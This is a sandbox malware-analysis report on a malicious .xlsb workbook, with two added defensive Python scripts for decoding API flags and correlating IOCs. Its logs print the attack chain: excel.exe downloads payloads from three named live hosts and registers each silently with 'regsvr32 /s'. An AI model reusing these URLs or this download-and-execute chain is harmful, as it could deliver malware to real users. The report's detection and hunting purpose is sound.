Summary | ZeroBOX

E-1253417553.xlsb

Tags: Malicious Library; Excel Binary Workbook file format (xlsb)
Category FILE
Machine s1_win7_x6401
Started April 13, 2022, 9:37 a.m.
Completed April 13, 2022, 9:39 a.m.
Size 1.2MB
Type Microsoft Excel 2007+
MD5 c06fd22e66beb0fb9b58341480ae5f05
SHA256 a922f7119db11ccd5fd82dada8027bb11884d349074dcb1c0b7a62348e73454e
CRC32 F8026E72
ssdeep 24576:WRDb86nFSv/iMkSy6HYFb50ezNHICBWDxjTBPzC/eA3ctriSo+fTAzZK0jR4kye1:WR384SniMkSyWYFFbzedJTBPzcctS+f0
Yara
  • xlsb - Excel Binary Workbook file format detection
  • Malicious_Library_Zero - Malicious_Library

Name | Response | Post-Analysis Lookup
No hosts contacted.
IP Address | Status | Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API | Arguments | Status | Return | Repeated (each call entry below ends with its Status, Return and Repeated values, e.g. "1 0 0")

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fcc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x750c1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76451000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x734f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fa21000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fa11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f9d1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x048d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x048d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x09480000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2800
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x09490000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file Yhdthd2.ocx
file Yhdthd.ocx
file Yhdthd1.ocx
Time & API | Arguments | Status | Return | Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003a4
filepath: C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
desired_access: 0xc0110080 (GENERIC_READ|GENERIC_WRITE|SYNCHRONIZE|DELETE|FILE_READ_ATTRIBUTES)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
create_options: 4198496 (FILE_OPEN_NO_RECALL|FILE_DELETE_ON_CLOSE|FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x0000040c
filepath: C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
desired_access: 0xc0110080 (GENERIC_READ|GENERIC_WRITE|SYNCHRONIZE|DELETE|FILE_READ_ATTRIBUTES)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
create_options: 4198496 (FILE_OPEN_NO_RECALL|FILE_DELETE_ON_CLOSE|FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x00000444
filepath: C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
desired_access: 0xc0110080 (GENERIC_READ|GENERIC_WRITE|SYNCHRONIZE|DELETE|FILE_READ_ATTRIBUTES)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$E-1253417553.xlsb
create_options: 4198496 (FILE_OPEN_NO_RECALL|FILE_DELETE_ON_CLOSE|FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
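Two caveats on the memory and file sections above, with a decoder to back them. First, the NtProtectVirtualMemory entries all flip a single 4096-byte page at an address ending in 0x1000 (the first page after a module's image base), which is what inline patching of already-loaded DLLs looks like, including patching done by instrumentation rather than by the sample; the NtAllocateVirtualMemory entries at 64 KiB-aligned bases (0x048d0000, 0x09480000, 0x09490000) are fresh RWX regions and are the stronger unpacking signal. Second, the hidden, delete-on-close ~$E-1253417553.xlsb is Excel's own owner/lock file for the open workbook, not something the sample wrote. Sandbox renderers map raw values through a fixed table and silently drop bits they do not know: 0xc0110080 also contains GENERIC_READ and 4198496 (0x401060) also contains FILE_OPEN_NO_RECALL. The script below is an added example for this page, not ZeroBOX or Cuckoo code; its bit tables are the public winnt.h/ntifs.h definitions, the sample values are copied by hand from the entries above (constructed input), and classify_rwx_address is this example's own heuristic, not a sandbox rule.

```python
"""Re-decode the raw NT argument values printed in this sandbox report.

Added example for this page; not ZeroBOX/Cuckoo code. Bit tables are the
public winnt.h / ntifs.h definitions. Sample values are copied from the
report's API log (constructed input, not parsed from the page).
"""
from typing import Dict, List, Tuple

# NtCreateFile DesiredAccess (ACCESS_MASK): generic, standard, file-specific rights.
ACCESS_MASK: Dict[int, str] = {
    0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL",
    0x00100000: "SYNCHRONIZE", 0x00080000: "WRITE_OWNER", 0x00040000: "WRITE_DAC",
    0x00020000: "READ_CONTROL", 0x00010000: "DELETE",
    0x00000100: "FILE_WRITE_ATTRIBUTES", 0x00000080: "FILE_READ_ATTRIBUTES",
    0x00000040: "FILE_DELETE_CHILD", 0x00000020: "FILE_EXECUTE",
    0x00000010: "FILE_WRITE_EA", 0x00000008: "FILE_READ_EA",
    0x00000004: "FILE_APPEND_DATA", 0x00000002: "FILE_WRITE_DATA",
    0x00000001: "FILE_READ_DATA",
}
# NtCreateFile CreateOptions (ntifs.h).
CREATE_OPTIONS: Dict[int, str] = {
    0x00000001: "FILE_DIRECTORY_FILE", 0x00000002: "FILE_WRITE_THROUGH",
    0x00000004: "FILE_SEQUENTIAL_ONLY", 0x00000008: "FILE_NO_INTERMEDIATE_BUFFERING",
    0x00000010: "FILE_SYNCHRONOUS_IO_ALERT", 0x00000020: "FILE_SYNCHRONOUS_IO_NONALERT",
    0x00000040: "FILE_NON_DIRECTORY_FILE", 0x00000080: "FILE_CREATE_TREE_CONNECTION",
    0x00000100: "FILE_COMPLETE_IF_OPLOCKED", 0x00000200: "FILE_NO_EA_KNOWLEDGE",
    0x00000400: "FILE_OPEN_REMOTE_INSTANCE", 0x00000800: "FILE_RANDOM_ACCESS",
    0x00001000: "FILE_DELETE_ON_CLOSE", 0x00002000: "FILE_OPEN_BY_FILE_ID",
    0x00004000: "FILE_OPEN_FOR_BACKUP_INTENT", 0x00008000: "FILE_NO_COMPRESSION",
    0x00010000: "FILE_OPEN_REQUIRING_OPLOCK", 0x00020000: "FILE_DISALLOW_EXCLUSIVE",
    0x00100000: "FILE_RESERVE_OPFILTER", 0x00200000: "FILE_OPEN_REPARSE_POINT",
    0x00400000: "FILE_OPEN_NO_RECALL", 0x00800000: "FILE_OPEN_FOR_FREE_SPACE_QUERY",
}
# Page protection: the low byte is exactly one base value; higher bits are modifiers.
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
              0x100000: "MEM_TOP_DOWN", 0x200000: "MEM_WRITE_WATCH",
              0x400000: "MEM_PHYSICAL", 0x20000000: "MEM_LARGE_PAGES"}


def decode_flags(value: int, table: Dict[int, str]) -> Tuple[List[str], int]:
    """Split a bitmask into known names (highest bit first) plus the leftover
    bits the table does not cover, so nothing is silently dropped."""
    names, remaining = [], value
    for bit in sorted(table, reverse=True):
        if remaining & bit == bit:
            names.append(table[bit])
            remaining &= ~bit
    return names, remaining


def missing_from_report(value: int, reported: str, table: Dict[int, str]) -> List[str]:
    """Names present in the raw value that a rendered 'A|B|C' string omitted."""
    names, _ = decode_flags(value, table)
    shown = set(reported.split("|"))
    return [n for n in names if n not in shown]


def decode_protection(value: int) -> str:
    """Base protection from the low byte, then any PAGE_GUARD/NOCACHE/WRITECOMBINE."""
    base = PAGE_BASE.get(value & 0xFF, f"0x{value & 0xFF:x}")
    mods, rest = decode_flags(value & ~0xFF, PAGE_MODIFIERS)
    return "|".join([base] + mods + ([f"0x{rest:x}"] if rest else []))


def is_writable_executable(value: int) -> bool:
    """True for the two W+X base protections (the classic unpacking signal)."""
    return (value & 0xFF) in (0x40, 0x80)


def classify_rwx_address(addr: int) -> str:
    """Heuristic (this example's assumption, not a sandbox rule): a page at
    image_base+0x1000 is the first section of a loaded DLL, which is what inline
    patching touches; a 64 KiB-aligned base is a fresh VirtualAlloc region."""
    if addr & 0xFFFF == 0x1000:
        return "first page of a loaded image"
    if addr & 0xFFFF == 0:
        return "fresh 64KiB-aligned region"
    return "other"


if __name__ == "__main__":
    for label, value, table in [("desired_access", 0xc0110080, ACCESS_MASK),
                                ("create_options", 4198496, CREATE_OPTIONS),
                                ("allocation_type", 4096, ALLOC_TYPE)]:
        names, rest = decode_flags(value, table)
        print(f"{label} 0x{value:08x}: {'|'.join(names)}" + (f" +0x{rest:x}" if rest else ""))
    for addr in (0x6fcc1000, 0x76941000, 0x048d0000, 0x09480000):  # from the report
        print(f"{decode_protection(64)} at 0x{addr:08x}: {classify_rwx_address(addr)}")
```

Run it against any Cuckoo-style JSON report by feeding the raw integer arguments to decode_flags; the leftover value it returns is the quickest way to spot a renderer table that is out of date.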
cmdline regsvr32 /s C:\..\\Yhdthd.ocx
cmdline regsvr32 /s C:\..\\Yhdthd1.ocx
cmdline regsvr32 /s C:\..\\Yhdthd2.ocx
Time & API | Arguments | Status | Return | Repeated

URLDownloadToFileW

url: http://ateliecordefeltro.com/T9kpu5Vx0ag/Omnh.png7790983516.dat
stack_pivoted: 0
filepath_r: C:\..\\Yhdthd.ocx
filepath: Yhdthd.ocx
1 0 0

URLDownloadToFileW

url: http://lojaalamar.com.br/nokjRAAdeCA/Omnh.png7790983516.dat
stack_pivoted: 0
filepath_r: C:\..\\Yhdthd1.ocx
filepath: Yhdthd1.ocx
1 0 0

URLDownloadToFileW

url: http://amalalhamed.com/QOqUcVgYi9n/Omnh.png7790983516.dat
stack_pivoted: 0
filepath_r: C:\..\\Yhdthd2.ocx
filepath: Yhdthd2.ocx
1 0 0
parent_process excel.exe martian_process regsvr32 /s C:\..\\Yhdthd.ocx
parent_process excel.exe martian_process regsvr32 /s C:\..\\Yhdthd1.ocx
parent_process excel.exe martian_process regsvr32 /s C:\..\\Yhdthd2.ocx
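The chain the report documents is excel.exe calling URLDownloadToFileW three times, writing each payload as an .ocx under an elided path, and then spawning regsvr32 /s (silent, no registration dialog) on each one. Note that the network tables above are empty even though all three download calls are logged, so the hosts are IOCs taken from the API log, not observed traffic. The script below is an added example for this page, not ZeroBOX or Cuckoo code: it joins the download records to the regsvr32 command lines by file basename (the directory is elided on the page), flags the Office-parent to regsvr32 relationship, and checks whether the name served by the URL carries the extension the file was saved under. The event records are constructed by hand from the entries above, and the record field names and the OFFICE_PARENTS set are this example's own.

```python
"""Correlate the download -> drop -> regsvr32 chain from this report's API log.

Added example for this page; not ZeroBOX/Cuckoo code. DOWNLOADS and
PROCESSES are constructed from the report's URLDownloadToFileW and
martian_process entries; field names and OFFICE_PARENTS are assumptions.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

DOWNLOADS = [  # constructed from the URLDownloadToFileW entries above
    {"url": "http://ateliecordefeltro.com/T9kpu5Vx0ag/Omnh.png7790983516.dat",
     "filepath": r"C:\..\\Yhdthd.ocx"},
    {"url": "http://lojaalamar.com.br/nokjRAAdeCA/Omnh.png7790983516.dat",
     "filepath": r"C:\..\\Yhdthd1.ocx"},
    {"url": "http://amalalhamed.com/QOqUcVgYi9n/Omnh.png7790983516.dat",
     "filepath": r"C:\..\\Yhdthd2.ocx"},
]
PROCESSES = [  # constructed from the parent_process / martian_process entries above
    {"parent": "excel.exe", "cmdline": r"regsvr32 /s C:\..\\Yhdthd.ocx"},
    {"parent": "excel.exe", "cmdline": r"regsvr32 /s C:\..\\Yhdthd1.ocx"},
    {"parent": "excel.exe", "cmdline": r"regsvr32 /s C:\..\\Yhdthd2.ocx"},
]


def basename(path: str) -> str:
    """Last component of a Windows or URL path (tolerates the elided 'C:\\..\\\\')."""
    return re.split(r"[\\/]", path)[-1]


def parse_regsvr32(cmdline: str) -> Optional[Dict[str, object]]:
    """Return {"silent": bool, "target": path} for a regsvr32 command line, else None.
    regsvr32 takes switches as /x or -x; the last non-switch token is the module."""
    tokens = cmdline.split()
    if not tokens or basename(tokens[0].strip('"')).lower() not in ("regsvr32", "regsvr32.exe"):
        return None
    switches = [t.lower() for t in tokens[1:] if t[:1] in ("/", "-")]
    targets = [t for t in tokens[1:] if t[:1] not in ("/", "-")]
    if not targets:
        return None
    return {"silent": any(s in ("/s", "-s") for s in switches), "target": targets[-1]}


def correlate(downloads: List[Dict[str, str]], processes: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Join each Office-spawned regsvr32 to the download that wrote its target.
    The join key is the basename because the report elides the directory."""
    by_name = {basename(d["filepath"]): d["url"] for d in downloads}
    chains = []
    for p in processes:
        parsed = parse_regsvr32(p["cmdline"])
        if parsed is None or p["parent"].lower() not in OFFICE_PARENTS:
            continue
        name = basename(str(parsed["target"]))
        url = by_name.get(name)
        chains.append({"parent": p["parent"], "dropped": name, "url": url,
                       "host": urlparse(url).hostname if url else None,
                       "silent": parsed["silent"]})
    return chains


def extension_mismatch(url: str, dropped: str) -> bool:
    """True when the name served by the URL does not end in the extension the
    payload was written with (here a '.png...dat' name saved as .ocx)."""
    served = basename(urlparse(url).path).lower()
    return not served.endswith("." + dropped.rsplit(".", 1)[-1].lower())


def iocs(chains: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Deduplicated, sorted hosts and dropped file names for blocking/hunting."""
    return {"hosts": sorted({str(c["host"]) for c in chains if c["host"]}),
            "files": sorted({str(c["dropped"]) for c in chains})}


if __name__ == "__main__":
    found = correlate(DOWNLOADS, PROCESSES)
    for c in found:
        flag = " (served under a different extension)" if extension_mismatch(str(c["url"]), str(c["dropped"])) else ""
        print(f"{c['parent']} -> regsvr32{' /s' if c['silent'] else ''} {c['dropped']} <- {c['host']}{flag}")
    print(iocs(found))
```

As a hunting rule the useful predicate is the relationship, not the names: an Office process as parent of regsvr32 registering a module that the same process just downloaded. The file names and the URL path tokens in this sample are the parts an operator rotates per campaign.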